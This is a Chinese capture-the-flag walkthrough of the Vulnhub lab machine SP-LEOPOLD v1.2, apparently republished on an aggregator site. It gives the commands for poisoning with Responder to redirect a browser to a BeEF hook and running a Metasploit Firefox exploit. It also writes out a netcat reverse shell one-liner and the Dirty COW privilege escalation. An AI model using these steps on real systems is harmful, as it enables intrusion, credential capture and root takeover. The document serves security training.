【甄选靶场】Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)

news/2023/6/7 0:32:34

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月19日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

  • Vulnhub百个项目渗透
  • 前言
    • 信息收集
        • 设置重定向
        • 修改配置
        • 开启beef监听
        • 联动msf
    • 提权


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

nmap 192.168.253.0/24 -sP

在这里插入图片描述

└─# nmap -p- --min-rate 10000 -A 192.168.247.147139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.6.6 (workgroup: WORKGROUP)

在渗透测试中,使用Responder开启回应请求功能,Responuer会自动回应客户端的请求并声明自己就是被输人了错误计算机名的那台机器,并且尝试建立SMB连接。客户端项发送自已的Nt-NTeLM Hash进行身份验证,此时将得到目标机器的Net-NTLM Hash!!

它是一个专注于Web浏览器的渗透测试工具。 ​BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。

设置重定向

gedit /usr/share/responder/files/rong.html

在这里插入图片描述

<html><meta http-equiv="refresh" content="0; URL='http://192.168.247.130:3000/demos/basic.html'" /></html>

修改配置

gedit /usr/share/responder/Responder.conf
80行修改:
Serve-Html = On

82行修改:
HtmlFilename = files/rong.html

在这里插入图片描述
在这里插入图片描述
如果嘈杂,可以修改41行为受害者ip来过滤
而后在开启responder之后就会看到如图,说明过滤成功
在这里插入图片描述

开启beef监听

responder --basic -I eth0      #开启监听 systemctl start beef-xss.service  #开启beef
systemctl stop beef-xss.service     #关闭beef
systemctl restart beef-xss.service  #重启beef
systemctl status beef-xss    #查看状态

在这里插入图片描述

初始账号密码都是beef

过一会就能看到在面板出现火狐浏览器的标志,并且看到版本是16

在这里插入图片描述并且能看到kali终端监听那一块有这样的
在这里插入图片描述
接下来就要去到msf联动

联动msf

use multi/browser/firefox_tostring_console_injectionrun  
过一会会出现如下字样[*] Using URL: http://192.168.253.138:8080/OnBp6P92HK然后将rong.html的url部分修改为:http://192.168.253.138:8080/OnBp6P92HK
然后重新运行:
Responder.py --basic -I eth0 
sessions -i 1
这时候我们就可以得到一个shell,但是因为这个shell不好用,所以我们简单的反弹一个shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.253.138 1234 >/tmp/f
nc -vlp 1234建立一个python终端
python -c 'import pty;pty.spawn("/bin/bash")'

提权

linux版本脆弱
1)Linux version 3.5.0-17-generic
linpeas建议使用脏牛cp /usr/share/exploitdb/exploits/linux/local/40839.c .
传递过去编译如下
gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
密码输入:rong   ---等待几十秒su firefart
rong

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.exyb.cn/news/show-4579237.html

如若内容造成侵权/违法违规/事实不符,请联系郑州代理记账网进行投诉反馈,一经查实,立即删除!

相关文章

汽车轮毂识别项目介绍

文章目录一、项目介绍二、技术平台三、部分技术复现3.1绘制直方图3.2Hu不变矩3.3轮廓提取3.4轮毂洞数3.5中心图3.6分类识别四、总结引言&#xff1a;因为硬盘损坏&#xff0c;之前的很多资料都找不到&#xff0c;现在凭借印象依靠MATLAB复现了一些功能&#xff0c;希望这个项目…

浅谈汽车轮胎匹配视觉防错检测应用

前段时间都是分享到理论成果&#xff0c;今天看到一篇是结合车厂实际状况来进行的&#xff0c;可以从不同角度看看机器视觉在汽车行业中的应用。 1 前言 工业 4.0 的核心是数据。随着智能装备和智能终端的普及以及各种传感器的应用&#xff0c;汽车工业中的生产数据、产品数据…

Opencv学习笔记(十四)轮廓检测

引言: 本次轮廓检测的介绍基于opencv中的findContours()函数&#xff0c;首先介绍了它的数学原理&#xff0c;然后对其参数进行分析&#xff0c;最后结合drawContours()函数给出了一个轮廓检测的运用实例。 大纲一、轮廓检测原理二、轮廓在opencv中的应用一、轮廓检测原理 ope…

汽车轮毂检测,轮毂检测方案,轮毂视觉检测,深度视觉系统

轮毂表面缺陷检测是轮毂企业生产物流过程中的重要一环。通过市场的初步调研 , 此前主要通过人工检测进行缺陷肉眼检测和分拣等。而由于汽车轮毂结构复杂,人工检测的方法效率低、工作量大,此种检测方式越来越难以满足轮毂生产过程越来越高的快速、准确、稳定的要求。 为了实现生…

类的初始化2023018

类的初始化&#xff1a; 第一次使用某个类&#xff0c;例如Person类&#xff0c;系统通常会在第一次使用Person类时加载这个类并初始化这个类。在类的准备阶段&#xff0c;系统将会为该类的类变量分配内存空间&#xff0c;并指定默认初始值。当Person类初始化完成后&#xff0c…

mysql 基本组成

1 mysql 基本组成 1.1、mysql连接器的工作流程: 1.2、查看连接状态: show processlist; Note:客户端太长时间没动静 就自动断开 这个时间是由wait_timeout参数控制的,默认8h 长连接短链接 长连接是链接成功后,如果客户端持续有请求,则使用同一个链接[尽量使用长连接,因为每次…

单核工作法18:简化协作(下)

前言 工欲善其事必先利其器。 学习一点儿如何安排时间产出工作量的方法&#xff0c;对于生活也是很有必要的。 目录&#xff1a; 前言目录&#xff1a;议会场合本杰明 富兰克林效应沟通带宽鸡尾酒会问题组织会议接受邀请的条件打电话如实预估一图胜千言问题排队时间临场失误认…

每月碎碎念 | 2019.09

Hi&#xff0c;这里是新开辟的“碎碎念”的世界。这个区域作为记录心情的地方&#xff0c;把每日的所思所想所感所悟记录在这里&#xff0c;当做一个写日记的地方&#xff0c;每个月底汇总成一篇文章&#xff0c;只给我的朋友看。2019-9-1多年前&#xff0c;我在网上读到彼得诺…